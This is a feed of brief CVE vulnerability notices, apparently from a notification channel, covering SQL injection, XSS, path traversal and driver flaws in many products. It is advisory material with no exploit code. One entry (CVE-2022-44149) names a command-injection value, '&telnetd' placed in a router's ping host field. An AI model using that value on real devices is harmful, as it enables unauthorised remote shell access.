🚨 CVE-2014-125053A vulnerability was found in Piwigo-Guest-Book up to 1.3.0. It has been declared as critical. This vulnerability affects unknown code of the file include/guestbook.inc.php of the component Navigation Bar. The manipulation of the argument start leads to sql injection. Upgrading to version 1.3.1 is able to address this issue. The name of the patch is 0cdd1c388edf15089c3a7541cefe7756e560581d. It is recommended to upgrade the affected component. VDB-217582 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-07 02:29:38 |
🚨 CVE-2022-45911An issue was discovered in Zimbra Collaboration (ZCS) 9.0. XSS can occur on the Classic UI login page by injecting arbitrary JavaScript code in the username field. This occurs before the user logs into the system, which means that even if the attacker executes arbitrary JavaScript, they will not get any sensitive information.🎖@cveNotify |
|
| 2023-01-07 02:29:37 |
🚨 CVE-2022-45913An issue was discovered in Zimbra Collaboration (ZCS) 9.0. XSS can occur via one of attributes in webmail URLs to execute arbitrary JavaScript code, leading to information disclosure.🎖@cveNotify |
|
| 2023-01-07 00:30:07 |
🚨 CVE-2022-2484The signature check in the Nokia ASIK AirScale system module version 474021A.101 can be bypassed allowing an attacker to run modified firmware. This could result in the execution of a malicious kernel, arbitrary programs, or modified Nokia programs.🎖@cveNotify |
|
| 2023-01-07 00:30:06 |
🚨 CVE-2022-40201Bentley Systems MicroStation Connect versions 10.17.0.209 and prior are vulnerable to a Stack-Based Buffer Overflow when a malformed design (DGN) file is parsed. This may allow an attacker to execute arbitrary code.🎖@cveNotify |
|
| 2023-01-07 00:30:05 |
🚨 CVE-2022-41613Bentley Systems MicroStation Connect versions 10.17.0.209 and prior are vulnerable to an Out-of-Bounds Read when when parsing DGN files, which may allow an attacker to crash the product, disclose sensitive information, or execute arbitrary code.🎖@cveNotify |
|
| 2023-01-07 00:30:03 |
🚨 CVE-2022-44939Efs Software Easy Chat Server Version 3.1 was discovered to contain a DLL hijacking vulnerability via the component TextShaping.dll. This vulnerability allows attackers to execute arbitrary code via a crafted DLL.🎖@cveNotify |
|
| 2023-01-07 00:30:02 |
🚨 CVE-2014-125028A vulnerability was found in valtech IDP Test Client and classified as problematic. Affected by this issue is some unknown functionality of the file python-flask/main.py. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The name of the patch is f1e7b3d431c8681ec46445557125890c14fa295f. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217148.🎖@cveNotify |
|
| 2023-01-07 00:30:01 |
🚨 CVE-2022-42255NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer (nvidia.ko), where an out-of-bounds array access may lead to denial of service, information disclosure, or data tampering.🎖@cveNotify |
|
| 2023-01-07 00:30:00 |
🚨 CVE-2022-42256NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer (nvidia.ko), where an integer overflow in index validation may lead to denial of service, information disclosure, or data tampering.🎖@cveNotify |
|
| 2023-01-07 00:29:59 |
🚨 CVE-2017-20157A vulnerability was found in Ariadne Component Library up to 2.x. It has been classified as critical. Affected is an unknown function of the file src/url/Url.php. The manipulation leads to server-side request forgery. Upgrading to version 3.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-217140.🎖@cveNotify |
|
| 2023-01-07 00:29:58 |
🚨 CVE-2023-0028Cross-site Scripting (XSS) - Stored in GitHub repository linagora/twake prior to 2023.Q1.1200+.🎖@cveNotify |
|
| 2023-01-07 00:29:57 |
🚨 CVE-2017-20156A vulnerability was found in Exciting Printer and classified as critical. This issue affects some unknown processing of the file lib/printer/jobs/prepare_page.rb of the component Argument Handler. The manipulation of the argument URL leads to command injection. The name of the patch is 5f8c715d6e2cc000f621a6833f0a86a673462136. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217139.🎖@cveNotify |
|
| 2023-01-07 00:29:56 |
🚨 CVE-2022-4867Cross-Site Request Forgery (CSRF) in GitHub repository froxlor/froxlor prior to 2.0.0-beta1.🎖@cveNotify |
|
| 2023-01-07 00:29:54 |
🚨 CVE-2022-4866Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2023-01-07 00:29:52 |
🚨 CVE-2022-4865Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.9.1.🎖@cveNotify |
|
| 2023-01-07 00:29:51 |
🚨 CVE-2022-4868Improper Authorization in GitHub repository froxlor/froxlor prior to 2.0.0-beta1.🎖@cveNotify |
|
| 2023-01-07 00:29:49 |
🚨 CVE-2014-125052A vulnerability was found in JervenBolleman sparql-identifiers and classified as critical. This issue affects some unknown processing of the file src/main/java/org/identifiers/db/RegistryDao.java. The manipulation leads to sql injection. The name of the patch is 44bb0db91c064e305b192fc73521d1dfd25bde52. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217571.🎖@cveNotify |
|
| 2023-01-07 00:29:48 |
🚨 CVE-2018-25067A vulnerability, which was classified as critical, was found in JoomGallery up to 3.3.3. This affects an unknown part of the file administrator/components/com_joomgallery/views/config/tmpl/default.php of the component Image Sort Handler. The manipulation leads to sql injection. Upgrading to version 3.3.4 is able to address this issue. The name of the patch is dc414ee954e849082260f8613e15a1c1e1d354a1. It is recommended to upgrade the affected component. The identifier VDB-217569 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-07 00:29:46 |
🚨 CVE-2018-25068A vulnerability has been found in devent globalpom-utils up to 4.5.0 and classified as critical. This vulnerability affects the function createTmpDir of the file globalpomutils-fileresources/src/main/java/com/anrisoftware/globalpom/fileresourcemanager/FileResourceManagerProvider.java. The manipulation leads to insecure temporary file. The attack can be initiated remotely. Upgrading to version 4.5.1 is able to address this issue. The name of the patch is 77a820bac2f68e662ce261ecb050c643bd7ee560. It is recommended to upgrade the affected component. VDB-217570 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-07 00:29:45 |
🚨 CVE-2022-34681NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler, where improper input validation of a display-related data structure may lead to denial of service.🎖@cveNotify |
|
| 2023-01-07 00:29:44 |
🚨 CVE-2022-34682NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer, where an unprivileged regular user can cause a null-pointer dereference, which may lead to denial of service.🎖@cveNotify |
|
| 2023-01-07 00:29:42 |
🚨 CVE-2022-34683NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, where a null-pointer dereference occurs, which may lead to denial of service.🎖@cveNotify |
|
| 2023-01-06 21:30:00 |
🚨 CVE-2022-45918ILIAS before 7.16 allows External Control of File Name or Path.🎖@cveNotify |
|
| 2023-01-06 21:29:59 |
🚨 CVE-2022-30679Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-01-06 21:29:58 |
🚨 CVE-2022-44462Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-01-06 21:29:57 |
🚨 CVE-2022-44468Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-01-06 21:29:53 |
🚨 CVE-2022-44473Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-01-06 21:29:52 |
🚨 CVE-2022-42366Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-01-06 21:29:51 |
🚨 CVE-2022-42360Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-01-06 21:29:47 |
🚨 CVE-2022-42367Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-01-06 21:29:46 |
🚨 CVE-2022-44467Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-01-06 21:29:45 |
🚨 CVE-2022-44471Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-01-06 21:29:41 |
🚨 CVE-2022-44474Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-01-06 21:29:40 |
🚨 CVE-2022-4859A vulnerability, which was classified as problematic, has been found in Joget up to 7.0.33. This issue affects the function submitForm of the file wflow-core/src/main/java/org/joget/plugin/enterprise/UserProfileMenu.java of the component User Profile Menu. The manipulation of the argument firstName/lastName leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 7.0.34 is able to address this issue. The name of the patch is 9a77f508a2bf8cf661d588f37a4cc29ecaea4fc8. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217055.🎖@cveNotify |
|
| 2023-01-06 21:29:39 |
🚨 CVE-2022-44463Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-01-06 21:29:38 |
🚨 CVE-2022-44465Adobe Experience Manager version 6.5.14 (and earlier) is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-01-06 19:29:59 |
🚨 CVE-2022-3970A vulnerability was found in LibTIFF. It has been classified as critical. This affects the function TIFFReadRGBATileExt of the file libtiff/tif_getimage.c. The manipulation leads to integer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 227500897dfb07fb7d27f7aa570050e62617e3be. It is recommended to apply a patch to fix this issue. The identifier VDB-213549 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-06 19:29:58 |
🚨 CVE-2022-4773** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as problematic was found in cloudsync. Affected by this vulnerability is the function getItem of the file src/main/java/cloudsync/connector/LocalFilesystemConnector.java. The manipulation leads to path traversal. It is possible to launch the attack on the local host. The name of the patch is 3ad796833398af257c28e0ebeade68518e0e612a. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216919. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-01-06 19:29:57 |
🚨 CVE-2020-36563XML Digital Signatures generated and validated using this package use SHA-1, which may allow an attacker to craft inputs which cause hash collisions depending on their control over the input.🎖@cveNotify |
|
| 2023-01-06 19:29:56 |
🚨 CVE-2022-41967Dragonfly is a Java runtime dependency management library. Dragonfly v0.3.0-SNAPSHOT does not configure DocumentBuilderFactory to prevent XML external entity (XXE) attacks. This issue is patched in 0.3.1-SNAPSHOT. As a workaround, since Dragonfly only parses XML `SNAPSHOT` versions are being resolved, this vulnerability may be avoided by not trying to resolve `SNAPSHOT` versions.🎖@cveNotify |
|
| 2023-01-06 19:29:55 |
🚨 CVE-2022-46172authentik is an open-source Identity provider focused on flexibility and versatility. In versions prior to 2022.10.4, and 2022.11.4, any authenticated user can create an arbitrary number of accounts through the default flows. This would circumvent any policy in a situation where it is undesirable for users to create new accounts by themselves. This may also affect other applications as these new basic accounts would exist throughout the SSO infrastructure. By default the newly created accounts cannot be logged into as no password reset exists by default. However password resets are likely to be enabled by most installations. This vulnerability pertains to the user context used in the default-user-settings-flow, /api/v3/flows/instances/default-user-settings-flow/execute/. This issue has been fixed in versions 2022.10.4 and 2022.11.4.🎖@cveNotify |
|
| 2023-01-06 19:29:52 |
🚨 CVE-2020-36562Due to unchecked type assertions, maliciously crafted messages can cause panics, which may be used as a denial of service vector.🎖@cveNotify |
|
| 2023-01-06 19:29:51 |
🚨 CVE-2014-125050A vulnerability was found in ScottTZhang voter-js and classified as critical. Affected by this issue is some unknown functionality of the file main.js. The manipulation leads to sql injection. The name of the patch is 6317c67a56061aeeaeed3cf9ec665fd9983d8044. It is recommended to apply a patch to fix this issue. VDB-217562 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-06 19:29:50 |
🚨 CVE-2020-36643A vulnerability was found in intgr uqm-wasm. It has been classified as critical. This affects the function log_displayBox in the library sc2/src/libs/log/msgbox_macosx.m. The manipulation leads to format string. The name of the patch is 1d5cbf3350a02c423ad6bef6dfd5300d38aa828f. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217563.🎖@cveNotify |
|
| 2023-01-06 19:29:49 |
🚨 CVE-2022-44149The web service on Nexxt Amp300 ARN02304U8 42.103.1.5095 devices allows remote OS command execution by placing &telnetd in the JSON host field to the ping feature of the goform/sysTools component. Authentication is required.🎖@cveNotify |
|
| 2023-01-06 19:29:45 |
🚨 CVE-2022-44877RESERVED An issue in the /login/index.php component of Centos Web Panel 7 before v0.9.8.1147 allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests.🎖@cveNotify |
|
| 2023-01-06 19:29:44 |
🚨 CVE-2022-4778StreamX applications from versions 6.02.01 to 6.04.34 are affected by a path traversal vulnerability that allows authenticated users to get unauthorized access to files on the server's filesystem. StreamX applications using StreamView HTML component with the public web server feature activated are affected.🎖@cveNotify |
|
| 2023-01-06 19:29:43 |
🚨 CVE-2020-36559Due to improper santization of user input, HTTPEngine.Handle allows for directory traversal, allowing an attacker to read files outside of the target directory that the server has permission to read.🎖@cveNotify |
|
| 2023-01-06 19:29:39 |
🚨 CVE-2018-25050A vulnerability, which was classified as problematic, has been found in Harvest Chosen up to 1.8.6. Affected by this issue is the function AbstractChosen of the file coffee/lib/abstract-chosen.coffee. The manipulation of the argument group_label leads to cross site scripting. The attack may be launched remotely. Upgrading to version 1.8.7 is able to address this issue. The name of the patch is 77fd031d541e77510268d1041ed37798fdd1017e. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216956.🎖@cveNotify |
|
| 2023-01-06 19:29:38 |
🚨 CVE-2019-25072Due to support of Gzip compression in request bodies, as well as a lack of limiting response body sizes, a malicious server can cause a client to consume a significant amount of system resources, which may be used as a denial of service vector.🎖@cveNotify |
|
| 2023-01-06 19:29:36 |
🚨 CVE-2021-4296A vulnerability, which was classified as problematic, has been found in w3c Unicorn. This issue affects the function ValidatorNuMessage of the file src/org/w3c/unicorn/response/impl/ValidatorNuMessage.java. The manipulation of the argument message leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 51f75c31f7fc33859a9a571311c67ae4e95d9c68. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217019.🎖@cveNotify |
|
| 2023-01-06 16:29:50 |
🚨 CVE-2018-25057A vulnerability was found in simple_php_link_shortener. It has been classified as critical. Affected is an unknown function of the file index.php. The manipulation of the argument $link["id"] leads to sql injection. The name of the patch is b26ac6480761635ed94ccb0222ba6b732de6e53f. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216996.🎖@cveNotify |
|
| 2023-01-06 16:29:49 |
🚨 CVE-2022-4611A vulnerability, which was classified as problematic, was found in Click Studios Passwordstate and Passwordstate Browser Extension Chrome. This affects an unknown part. The manipulation leads to hard-coded credentials. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The identifier VDB-216273 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-06 16:29:48 |
🚨 CVE-2022-4607A vulnerability was found in 3D City Database OGC Web Feature Service up to 5.2.0. It has been rated as problematic. This issue affects some unknown processing. The manipulation leads to xml external entity reference. Upgrading to version 5.2.1 is able to address this issue. The name of the patch is 246f4e2a97ad81491c00a7ed72ce5e7c7f75050a. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216215.🎖@cveNotify |
|
| 2023-01-06 16:29:47 |
🚨 CVE-2014-125048A vulnerability, which was classified as critical, has been found in kassi xingwall. This issue affects some unknown processing of the file app/controllers/oauth.js. The manipulation leads to session fixiation. The name of the patch is e9f0d509e1408743048e29d9c099d36e0e1f6ae7. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217559.🎖@cveNotify |
|
| 2023-01-06 16:29:46 |
🚨 CVE-2014-125049** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in typcn Blogile. Affected is the function getNav of the file server.js. The manipulation of the argument query leads to sql injection. The name of the patch is cfec31043b562ffefe29fe01af6d3c5ed1bf8f7d. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217560. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-01-06 16:29:45 |
🚨 CVE-2015-10018A vulnerability has been found in DBRisinajumi d2files and classified as critical. Affected by this vulnerability is the function actionUpload/actionDownloadFile of the file controllers/D2filesController.php. The manipulation leads to sql injection. Upgrading to version 1.0.0 is able to address this issue. The name of the patch is b5767f2ec9d0f3cbfda7f13c84740e2179c90574. It is recommended to upgrade the affected component. The identifier VDB-217561 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-06 16:29:41 |
🚨 CVE-2019-25099A vulnerability classified as critical was found in Arthmoor QSF-Portal. This vulnerability affects unknown code of the file index.php. The manipulation of the argument a leads to path traversal. The name of the patch is ea4f61e23ecb83247d174bc2e2cbab521c751a7d. It is recommended to apply a patch to fix this issue. VDB-217558 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-06 16:29:40 |
🚨 CVE-2015-10017A vulnerability has been found in HPI-Information-Systems ProLOD and classified as critical. This vulnerability affects unknown code. The manipulation of the argument this leads to sql injection. The name of the patch is 3f710905458d49c77530bd3cbcd8960457566b73. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217552.🎖@cveNotify |
|
| 2023-01-06 16:29:39 |
🚨 CVE-2018-25066A vulnerability was found in PeterMu nodebatis up to 2.1.x. It has been classified as critical. Affected is an unknown function. The manipulation leads to sql injection. Upgrading to version 2.2.0 is able to address this issue. The name of the patch is 6629ff5b7e3d62ad8319007a54589ec1f62c7c35. It is recommended to upgrade the affected component. VDB-217554 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-06 16:29:38 |
🚨 CVE-2020-36642A vulnerability was found in trampgeek jobe up to 1.6.x and classified as critical. This issue affects the function run_in_sandbox of the file application/libraries/LanguageTask.php. The manipulation leads to command injection. Upgrading to version 1.7.0 is able to address this issue. The name of the patch is 8f43daf50c943b98eaf0c542da901a4a16e85b02. It is recommended to upgrade the affected component. The identifier VDB-217553 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-06 16:29:37 |
🚨 CVE-2022-4879A vulnerability was found in Forged Alliance Forever up to 3746. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Vote Handler. The manipulation leads to improper authorization. Upgrading to version 3747 is able to address this issue. The name of the patch is 6880971bd3d73d942384aff62d53058c206ce644. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217555.🎖@cveNotify |
|
| 2023-01-06 14:29:38 |
🚨 CVE-2015-10017A vulnerability has been found in HPI-Information-Systems ProLOD and classified as critical. This vulnerability affects unknown code. The manipulation of the argument this leads to sql injection. The name of the patch is 3f710905458d49c77530bd3cbcd8960457566b73. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217552.🎖@cveNotify |
|
| 2023-01-06 14:29:37 |
🚨 CVE-2020-36642A vulnerability was found in trampgeek jobe up to 1.6.x and classified as critical. This issue affects the function run_in_sandbox of the file application/libraries/LanguageTask.php. The manipulation leads to command injection. Upgrading to version 1.7.0 is able to address this issue. The name of the patch is 8f43daf50c943b98eaf0c542da901a4a16e85b02. It is recommended to upgrade the affected component. The identifier VDB-217553 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-06 14:29:36 |
🚨 CVE-2022-4879A vulnerability was found in Forged Alliance Forever up to 3746. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Vote Handler. The manipulation leads to improper authorization. Upgrading to version 3747 is able to address this issue. The name of the patch is 6880971bd3d73d942384aff62d53058c206ce644. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217555.🎖@cveNotify |
|
| 2023-01-06 12:29:58 |
🚨 CVE-2021-4288A vulnerability was found in OpenMRS openmrs-module-referenceapplication up to 2.11.x. It has been rated as problematic. This issue affects some unknown processing of the file omod/src/main/webapp/pages/userApp.gsp. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 2.12.0 is able to address this issue. The name of the patch is 35f81901a4cb925747a9615b8706f5079d2196a1. It is recommended to upgrade the affected component. The identifier VDB-216881 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-06 12:29:57 |
🚨 CVE-2021-4289A vulnerability classified as problematic was found in OpenMRS openmrs-module-referenceapplication up to 2.11.x. Affected by this vulnerability is the function post of the file omod/src/main/java/org/openmrs/module/referenceapplication/page/controller/UserAppPageController.java of the component User App Page. The manipulation of the argument AppId leads to cross site scripting. The attack can be launched remotely. Upgrading to version 2.12.0 is able to address this issue. The name of the patch is 0410c091d46eed3c132fe0fcafe5964182659f74. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216883.🎖@cveNotify |
|
| 2023-01-06 12:29:56 |
🚨 CVE-2020-36634A vulnerability classified as problematic has been found in Indeed Engineering util up to 1.0.33. Affected is the function visit/appendTo of the file varexport/src/main/java/com/indeed/util/varexport/servlet/ViewExportedVariablesServlet.java. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 1.0.34 is able to address this issue. The name of the patch is c0952a9db51a880e9544d9fac2a2218a6bfc9c63. It is recommended to upgrade the affected component. VDB-216882 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-06 12:29:55 |
🚨 CVE-2019-25090A vulnerability was found in FreePBX arimanager up to 13.0.5.3 and classified as problematic. Affected by this issue is some unknown functionality of the component Views Handler. The manipulation of the argument dataurl leads to cross site scripting. The attack may be launched remotely. Upgrading to version 13.0.5.4 is able to address this issue. The name of the patch is 199dea7cc7020d3c469a86a39fbd80f5edd3c5ab. It is recommended to upgrade the affected component. VDB-216878 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-06 12:29:51 |
🚨 CVE-2019-25089A vulnerability has been found in Morgawr Muon 0.1.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file src/muon/handler.clj. The manipulation leads to insufficiently random values. The attack can be launched remotely. Upgrading to version 0.2.0-indev is able to address this issue. The name of the patch is c09ed972c020f759110c707b06ca2644f0bacd7f. It is recommended to upgrade the affected component. The identifier VDB-216877 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-06 12:29:50 |
🚨 CVE-2021-4286A vulnerability, which was classified as problematic, has been found in cocagne pysrp up to 1.0.16. This issue affects the function calculate_x of the file srp/_ctsrp.py. The manipulation leads to information exposure through discrepancy. Upgrading to version 1.0.17 is able to address this issue. The name of the patch is dba52642f5e95d3da7af1780561213ee6053195f. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216875.🎖@cveNotify |
|
| 2023-01-06 12:29:49 |
🚨 CVE-2022-4755A vulnerability was found in FlatPress and classified as problematic. This issue affects the function main of the file fp-plugins/mediamanager/panels/panel.mediamanager.file.php of the component Media Manager Plugin. The manipulation of the argument mm-newgallery-name leads to cross site scripting. The attack may be initiated remotely. The name of the patch is d3f329496536dc99f9707f2f295d571d65a496f5. It is recommended to apply a patch to fix this issue. The identifier VDB-216869 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-06 12:29:48 |
🚨 CVE-2021-4284A vulnerability classified as problematic has been found in OpenMRS HTML Form Entry UI Framework Integration Module up to 1.x. This affects an unknown part. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 2.0.0 is able to address this issue. The name of the patch is 811990972ea07649ae33c4b56c61c3b520895f07. It is recommended to upgrade the affected component. The identifier VDB-216873 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-06 12:29:45 |
🚨 CVE-2021-4282A vulnerability was found in FreePBX voicemail. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file page.voicemail.php. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 14.0.6.25 is able to address this issue. The name of the patch is 12e1469ef9208eda9d8955206e78345949236ee6. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216871.🎖@cveNotify |
|
| 2023-01-06 12:29:44 |
🚨 CVE-2021-4283A vulnerability was found in FreeBPX voicemail. It has been rated as problematic. Affected by this issue is some unknown functionality of the file views/ssettings.php of the component Settings Handler. The manipulation of the argument key leads to cross site scripting. The attack may be launched remotely. Upgrading to version 14.0.6.25 is able to address this issue. The name of the patch is ffce4882016076acd16fe0f676246905aa3cb2f3. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216872.🎖@cveNotify |
|
| 2023-01-06 12:29:43 |
🚨 CVE-2019-25087A vulnerability was found in RamseyK httpserver. It has been rated as critical. This issue affects the function ResourceHost::getResource of the file src/ResourceHost.cpp of the component URI Handler. The manipulation of the argument uri leads to path traversal: '../filedir'. The attack may be initiated remotely. The name of the patch is 1a0de56e4dafff9c2f9c8f6b130a764f7a50df52. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216863.🎖@cveNotify |
|
| 2023-01-06 12:29:42 |
🚨 CVE-2019-25086A vulnerability was found in IET-OU Open Media Player up to 1.5.0. It has been declared as problematic. This vulnerability affects the function webvtt of the file application/controllers/timedtext.php. The manipulation of the argument ttml_url leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.5.1 is able to address this issue. The name of the patch is 3f39f2d68d11895929c04f7b49b97a734ae7cd1f. It is recommended to upgrade the affected component. VDB-216862 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-06 12:29:39 |
🚨 CVE-2022-40049SQL injection vulnerability in sourcecodester Theme Park Ticketing System 1.0 allows remote attackers to view sensitive information via the id parameter to the /tpts/manage_user.php page.🎖@cveNotify |
|
| 2023-01-06 12:29:38 |
🚨 CVE-2022-42979Information disclosure due to an insecure hostname validation in the RYDE application 5.8.43 for Android and iOS allows attackers to take over an account via a deep link.🎖@cveNotify |
|
| 2023-01-06 12:29:37 |
🚨 CVE-2015-5521Cross-site scripting (XSS) vulnerability in BlackCat CMS 1.1.2 allows remote attackers to inject arbitrary web script or HTML via the name in a new group to backend/groups/index.php.🎖@cveNotify |
|
| 2023-01-05 21:29:57 |
🚨 CVE-2014-125043A vulnerability, which was classified as problematic, has been found in vicamo NetworkManager. Affected by this issue is the function send_arps of the file src/devices/nm-device.c. The manipulation leads to unchecked return value. The name of the patch is 4da19b89815cbf6e063e39bc33c04fe4b3f789df. It is recommended to apply a patch to fix this issue. VDB-217514 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-05 21:29:56 |
🚨 CVE-2014-125044A vulnerability, which was classified as critical, was found in soshtolsus wing-tight. This affects an unknown part of the file index.php. The manipulation of the argument p leads to file inclusion. It is possible to initiate the attack remotely. Upgrading to version 1.0.0 is able to address this issue. The name of the patch is 567bc33e6ed82b0d0179c9add707ac2b257aeaf2. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217515.🎖@cveNotify |
|
| 2023-01-05 21:29:55 |
🚨 CVE-2022-46177Discourse is an option source discussion platform. Prior to version 2.8.14 on the `stable` branch and version 3.0.0.beta16 on the `beta` and `tests-passed` branches, when a user requests for a password reset link email, then changes their primary email, the old reset email is still valid. When the old reset email is used to reset the password, the Discourse account's primary email would be re-linked to the old email. If the old email address is compromised or has transferred ownership, this leads to an account takeover. This is however mitigated by the SiteSetting `email_token_valid_hours` which is currently 48 hours. Users should upgrade to versions 2.8.14 or 3.0.0.beta15 to receive a patch. As a workaround, lower `email_token_valid_hours ` as needed.🎖@cveNotify |
|
| 2023-01-05 21:29:51 |
